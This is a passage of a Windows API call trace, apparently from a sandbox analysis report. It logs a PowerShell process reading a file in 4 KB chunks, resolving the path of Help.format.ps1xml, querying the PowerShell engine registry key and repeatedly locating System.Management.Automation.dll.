lpOverlapped=0x0) returned 1 [0073.956] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.956] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.956] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.959] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.959] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.959] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.960] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.960] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.960] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.961] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.961] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.961] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.961] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.962] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.962] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.962] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.962] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.963] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.963] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.966] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.966] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.966] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.967] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.967] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.967] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.967] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.968] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.968] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.968] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.968] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.968] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.969] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.970] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.971] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.972] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0xf37, lpOverlapped=0x0) returned 1 [0073.972] ReadFile (in: hFile=0x318, lpBuffer=0x36929d7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x36929d7*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.972] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.972] CloseHandle (hObject=0x318) returned 1 [0073.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.972] SetErrorMode (uMode=0x1) returned 0x1 [0073.972] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0073.973] SetErrorMode (uMode=0x1) returned 0x1 [0073.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.973] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.973] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.973] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0073.973] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.973] CoTaskMemFree (pv=0x1b3cd000) [0073.973] RegCloseKey (hKey=0x318) returned 0x0 [0073.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.983] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8b2ba3e6, Data2=0x9ed7, Data3=0x4049, Data4=([0]=0x8a, [1]=0x14, [2]=0x58, [3]=0x72, [4]=0xab, [5]=0x1e, [6]=0x8d, [7]=0xb5))) returned 0x0 [0073.984] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x85481776, Data2=0x2cc2, Data3=0x4656, Data4=([0]=0xba, [1]=0x7d, [2]=0xe4, [3]=0x97, [4]=0xb, [5]=0x93, [6]=0xdc, [7]=0x8e))) returned 0x0 [0073.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.035] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xefc019d4, Data2=0x1b33, Data3=0x4f43, Data4=([0]=0x99, [1]=0xdc, [2]=0x7a, [3]=0xc8, [4]=0xe, [5]=0x4e, [6]=0xbd, [7]=0xc3))) returned 0x0 [0074.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 